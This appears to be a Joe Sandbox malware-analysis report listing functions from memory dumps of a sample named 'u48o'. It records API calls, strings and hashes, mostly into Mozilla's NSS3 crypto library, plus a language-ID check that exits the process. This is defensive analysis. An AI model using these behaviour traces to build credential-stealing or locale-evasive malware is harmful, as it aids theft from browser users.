TlsGetValue.KERNEL32(?,6C33AB7F,?,00000000,?), ref: 6C334CE0
EnterCriticalSection.KERNEL32(?,?,6C33AB7F,?,00000000,?), ref: 6C334CF4
PL_HashTableLookup.NSS3(?,?,?,6C33AB7F,?,00000000,?), ref: 6C334D03
PR_Unlock.NSS3(?,00000000,?), ref: 6C334D10

Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4

PR_Now.NSS3(?,00000000,?), ref: 6C334D26

Part of subcall function 6C3D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DC6
Part of subcall function 6C3D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C420A27), ref: 6C3D9DD1
Part of subcall function 6C3D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C3D9DED

PR_Unlock.NSS3(?,?,00000000,?), ref: 6C334D98
PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6C334DDA
PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6C334E02

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4032354334-0
Opcode ID: 3dc9e018a8cc304fb154f5fc9ad7b1514fb3536ecf5e32a178134a31d5048848
Instruction ID: 15c0f6753f026beb30c04f5714f4d2ad2bf55b3093373a256e261cdc9d3748b7
Opcode Fuzzy Hash: 3dc9e018a8cc304fb154f5fc9ad7b1514fb3536ecf5e32a178134a31d5048848
Instruction Fuzzy Hash: 1641B7B6A00255ABEB01AF25EC40A667BB8FF0521DF054170EC4C97B16EB36D954CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 6C374DF0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6C37536F,00000022,?,?,00000000,?), ref: 6C374E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6C374F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6C374F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6C374FAE
free.MOZGLUE(?), ref: 6C374FC8

Strings

%s=%s, xrefs: 6C374F89
oS7l", xrefs: 6C374DFB, 6C374EF4, 6C374EC5
%s=%c%s%c, xrefs: 6C374FA9

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s$oS7l"
API String ID: 2709355791-17965633
Opcode ID: 0fbd666ca2249f812c0a4ff9d980ef76a749b6335d329631ef4f1b4085f8b7e0
Instruction ID: 48725fc56acb3035f2ea88ad7a11bedce38fa9aae5d49c980265800fd2ec6469
Opcode Fuzzy Hash: 0fbd666ca2249f812c0a4ff9d980ef76a749b6335d329631ef4f1b4085f8b7e0
Instruction Fuzzy Hash: 0C513C71A051458BEB21CA6D94907FFBBF59F46318F188125E894A7E40D33EA805CFB9

Uniqueness

Uniqueness Score: -1.00%

Function 6C34ACC0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C34ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C34AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C34AD23

Part of subcall function 6C42D930: PL_strncpyz.NSS3(?,?,?), ref: 6C42D963

PR_LogPrint.NSS3(?,00000000), ref: 6C34AD39

Strings

C_MessageDecryptFinal, xrefs: 6C34ACE1
(CK_INVALID_HANDLE), xrefs: 6C34AD1C
hSession = 0x%x, xrefs: 6C34ACFE, 6C34AD0E
nBl, xrefs: 6C34AD51, 6C34AD7B

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal$nBl
API String ID: 332880674-2828054072
Opcode ID: efcd0d883a6dc38c54ae15e20660d09a0a2d458d595a50743cc42a127ac55dd6
Instruction ID: ab2cac60d2c7ded205f0d6daf2ed735ca73664d696cd9eaa1a621d13e7147f18
Opcode Fuzzy Hash: efcd0d883a6dc38c54ae15e20660d09a0a2d458d595a50743cc42a127ac55dd6
Instruction Fuzzy Hash: 2421D031601164DFDB11FB649D99FAA33F5EB4731EF048039E80997A12DF259808CEB2

Uniqueness

Uniqueness Score: -1.00%

Function 6C35CC70 Relevance: 13.8, APIs: 9, Instructions: 313COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,00000100,?), ref: 6C35CD08
PK11_DoesMechanism.NSS3(?,?), ref: 6C35CE16
PR_SetError.NSS3(00000000,00000000), ref: 6C35D079

Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: DoesErrorK11_MechanismValuememcpy
String ID:
API String ID: 1351604052-0
Opcode ID: 523a323492a24b41ff2ed5f3d684c3dbcd69cb2fbe0d46a1cb3e335bafd3de18
Instruction ID: b889f31c91efe446d1bfeb24e34aef7bc7c1532f15a96d8b5ac5d7592becca97
Opcode Fuzzy Hash: 523a323492a24b41ff2ed5f3d684c3dbcd69cb2fbe0d46a1cb3e335bafd3de18
Instruction Fuzzy Hash: 5AC18EB1A002199BDB10DF24DC80FDAB7B4BF48318F5441A8E948A7741E776EEA5CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6C312C30 Relevance: 13.7, APIs: 9, Instructions: 166memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(079DEF86), ref: 6C312C5D

Part of subcall function 6C370D30: calloc.MOZGLUE ref: 6C370D50
Part of subcall function 6C370D30: TlsGetValue.KERNEL32 ref: 6C370D6D

CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001), ref: 6C312C8D
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C312CE0

Part of subcall function 6C312E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C312CDA,?,00000000), ref: 6C312E1E
Part of subcall function 6C312E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C312E33
Part of subcall function 6C312E00: TlsGetValue.KERNEL32 ref: 6C312E4E
Part of subcall function 6C312E00: EnterCriticalSection.KERNEL32(?), ref: 6C312E5E
Part of subcall function 6C312E00: PL_HashTableLookup.NSS3(?), ref: 6C312E71
Part of subcall function 6C312E00: PL_HashTableRemove.NSS3(?), ref: 6C312E84
Part of subcall function 6C312E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C312E96
Part of subcall function 6C312E00: PR_Unlock.NSS3 ref: 6C312EA9

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C312D23
CERT_IsCACert.NSS3(00000001,00000000), ref: 6C312D30
CERT_MakeCANickname.NSS3(00000001), ref: 6C312D3F
free.MOZGLUE(00000000), ref: 6C312D73
CERT_DestroyCertificate.NSS3(?), ref: 6C312DB8
free.MOZGLUE ref: 6C312DC8

Part of subcall function 6C313E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C313EC2
Part of subcall function 6C313E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C313ED6
Part of subcall function 6C313E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C313EEE
Part of subcall function 6C313E60: PR_CallOnce.NSS3(6C472AA4,6C3712D0), ref: 6C313F02
Part of subcall function 6C313E60: PL_FreeArenaPool.NSS3 ref: 6C313F14
Part of subcall function 6C313E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C313F27

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Item_$HashTable$ArenaCertificatePoolValueZfreefree$Alloc_CallCertCopyCriticalDecodeDestroyEnterErrorFreeInitLookupMakeNicknameOnceQuickRemoveSectionTempUnlockcalloc
String ID:
API String ID: 3941837925-0
Opcode ID: 12d9be628d2963cc3a5b8101e2cc1718538548f3c6e20d8d5b964042f6594400
Instruction ID: dcc440e915e5460d757272baddaedbd8b8676714364e6012dbab047bef3f12d2
Opcode Fuzzy Hash: 12d9be628d2963cc3a5b8101e2cc1718538548f3c6e20d8d5b964042f6594400
Instruction Fuzzy Hash: 4351EF71A183119FEB18DE69DD88B6B77E5EF85308F14042CECA583A50E733E8158F92

Uniqueness

Uniqueness Score: -1.00%

Function 6C32E400 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E432
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E44F

Part of subcall function 6C332C40: TlsGetValue.KERNEL32(#?3l,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C62
Part of subcall function 6C332C40: EnterCriticalSection.KERNEL32(0000001C,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C76
Part of subcall function 6C332C40: PL_HashTableLookup.NSS3(00000000,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C86
Part of subcall function 6C332C40: PR_Unlock.NSS3(00000000,?,?,?,?,6C32E477,?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C332C93

TlsGetValue.KERNEL32(?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E494
EnterCriticalSection.KERNEL32(?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E4AD
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E4D6
PR_Unlock.NSS3(?,?,?,00000001,00000000,?,?,6C333F23,?), ref: 6C32E52F

Strings

#?3l, xrefs: 6C32E409

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID: #?3l
API String ID: 3106257965-211498274
Opcode ID: b8965151bc1f49d67d6d8f56041716043027d2d4ddfd9529c21e262e396cf694
Instruction ID: d8f998f0efab63f80d8a6ae9d7c42e5873bfc57a9cb84f245d9985abce184dfa
Opcode Fuzzy Hash: b8965151bc1f49d67d6d8f56041716043027d2d4ddfd9529c21e262e396cf694
Instruction Fuzzy Hash: 3A4114B5A047158FCF00EF78D58556ABBF0FF09309B054969D8849BB15EB38E884CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6C328CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C33124D,00000001), ref: 6C328D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C33124D,00000001), ref: 6C328D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C33124D,00000001), ref: 6C328D73
PR_Unlock.NSS3(?,?,?,?,?,6C33124D,00000001), ref: 6C328D8C

Part of subcall function 6C3BDD70: TlsGetValue.KERNEL32 ref: 6C3BDD8C
Part of subcall function 6C3BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C3BDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C33124D,00000001), ref: 6C328DBA

Strings

KRAM, xrefs: 6C328D3E
KRAM, xrefs: 6C328CF9

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 8c09fe9fef35623d60a6bd60c95de8d39c0e598e508d8cb17032c842d51e1f62
Instruction ID: 5b92c2a55656f9af7f4d518d5e3f305711b21fb26f63c9437198c2a6d96927ac
Opcode Fuzzy Hash: 8c09fe9fef35623d60a6bd60c95de8d39c0e598e508d8cb17032c842d51e1f62
Instruction Fuzzy Hash: EA219FB2A046018FCF00EF38C4846AABBF4FF55308F15896AD88887705D739E846CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00418843 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041884F

Part of subcall function 00417B2C: __getptd_noexit.LIBCMT ref: 00417B2F
Part of subcall function 00417B2C: __amsg_exit.LIBCMT ref: 00417B3C

__amsg_exit.LIBCMT ref: 0041886F
__lock.LIBCMT ref: 0041887F
InterlockedDecrement.KERNEL32(?), ref: 0041889C
_free.LIBCMT ref: 004188AF
InterlockedIncrement.KERNEL32(00423530), ref: 004188C7

Strings

05B, xrefs: 004188B5, 004188BD

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID: 05B
API String ID: 3470314060-3788103304
Opcode ID: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction ID: f16d68fd9582ac4125616c5e50f94de62243aa4c7be40d45a23fde697d24a6fa
Opcode Fuzzy Hash: cb1538446801220004b0e94d2aebbf41e1672ae537431284a663a37179733970
Instruction Fuzzy Hash: 4501AD32A05621ABD720BF6A98057CA7770AF04725F90402FF810A3390CB7CA9C2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 6C3E4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C3E4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3E4DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3E4DCB
misuse, xrefs: 6C3E4DD5
API call with %s database connection pointer, xrefs: 6C3E4DBD
invalid, xrefs: 6C3E4DB8
%s at line %d of [%.10s], xrefs: 6C3E4DDA

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: e3385e3eff7b52e80e3284fae521f2e4a5d23508efaa730593d9800bdd63df49
Instruction ID: 32b353bd9f904c83fbb1a09fd63b7ff09aecd4edd653aa09c865055fa33b0f41
Opcode Fuzzy Hash: e3385e3eff7b52e80e3284fae521f2e4a5d23508efaa730593d9800bdd63df49
Instruction Fuzzy Hash: 5CF0B421F146B87BE741D19ACC10F8737959F0E31DF564AA2EE046BA53D20698609791

Uniqueness

Uniqueness Score: -1.00%

Function 00413430 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
ExitProcess.KERNEL32 ref: 00413465
ExitProcess.KERNEL32 ref: 0041346F
ExitProcess.KERNEL32 ref: 00413479
ExitProcess.KERNEL32 ref: 00413483
ExitProcess.KERNEL32 ref: 0041348D

Strings

*, xrefs: 0041344C

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: ExitProcess$DefaultLangUser
String ID: *
API String ID: 1494266314-163128923
Opcode ID: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction ID: 75b540bad49881e9417c8f8c63d74940121d586cf5f959f7794e893d96f52075
Opcode Fuzzy Hash: b54c11c67429caad35af0389be56d96782f86342cf804ea28b4a9cbeb8073ebc
Instruction Fuzzy Hash: 4BF05830508608EFE364EFE0EF0976CBBB1EB8E703F001195E60A86290CA744A119B65

Uniqueness

Uniqueness Score: -1.00%

Function 6C350C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?,?,00000000,?,?), ref: 6C350CB3

Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?), ref: 6C350DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?), ref: 6C350DEC

Part of subcall function 6C370F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C312AF5,?,?,?,?,?,6C310A1B,00000000), ref: 6C370F1A
Part of subcall function 6C370F10: malloc.MOZGLUE(00000001), ref: 6C370F30
Part of subcall function 6C370F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C370F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?), ref: 6C350DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C351444,?,00000001,?,00000000), ref: 6C350E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?), ref: 6C350E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?,?,6C351444,?,?,00000000), ref: 6C350E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C351444,?,00000001,?,00000000,00000000,?), ref: 6C350E79

Part of subcall function 6C361560: TlsGetValue.KERNEL32(00000000,?,6C330844,?), ref: 6C36157A
Part of subcall function 6C361560: EnterCriticalSection.KERNEL32(?,?,?,6C330844,?), ref: 6C36158F
Part of subcall function 6C361560: PR_Unlock.NSS3(?,?,?,?,6C330844,?), ref: 6C3615B2

Part of subcall function 6C32B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C331397,00000000,?,6C32CF93,5B5F5EC0,00000000,?,6C331397,?), ref: 6C32B1CB
Part of subcall function 6C32B1A0: free.MOZGLUE(5B5F5EC0,?,6C32CF93,5B5F5EC0,00000000,?,6C331397,?), ref: 6C32B1D2

Part of subcall function 6C3289E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C3288AE,-00000008), ref: 6C328A04
Part of subcall function 6C3289E0: EnterCriticalSection.KERNEL32(?), ref: 6C328A15
Part of subcall function 6C3289E0: memset.VCRUNTIME140(6C3288AE,00000000,00000132), ref: 6C328A27
Part of subcall function 6C3289E0: PR_Unlock.NSS3(?), ref: 6C328A35

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 4ffa7bb9dcd208fff7f306bc8b8f2047ba1b3b0dd484995ec7061a5d8b0fd97a
Instruction ID: e2fefaa235234348e3a95a26204fe35bdefc2266342eb79545534eedf8327b62
Opcode Fuzzy Hash: 4ffa7bb9dcd208fff7f306bc8b8f2047ba1b3b0dd484995ec7061a5d8b0fd97a
Instruction Fuzzy Hash: 3E5198B6E002505FEB109F64DC81EAB37A8AF4525CF550424EC499BB12E736ED258EE3

Uniqueness

Uniqueness Score: -1.00%

Function 6C362470 Relevance: 12.1, APIs: 8, Instructions: 141COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C362D7C,6C339192,?), ref: 6C36248E
EnterCriticalSection.KERNEL32(02B80138), ref: 6C3624A2
memset.VCRUNTIME140(6C362D7C,00000020,6C362D5C), ref: 6C36250E
memset.VCRUNTIME140(6C362D9C,00000020,6C362D7C), ref: 6C362535
memset.VCRUNTIME140(?,00000020,?), ref: 6C36255C
memset.VCRUNTIME140(?,00000020,?), ref: 6C362583
PR_Unlock.NSS3(?), ref: 6C362594
PR_SetError.NSS3(00000000,00000000), ref: 6C3625AF

Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
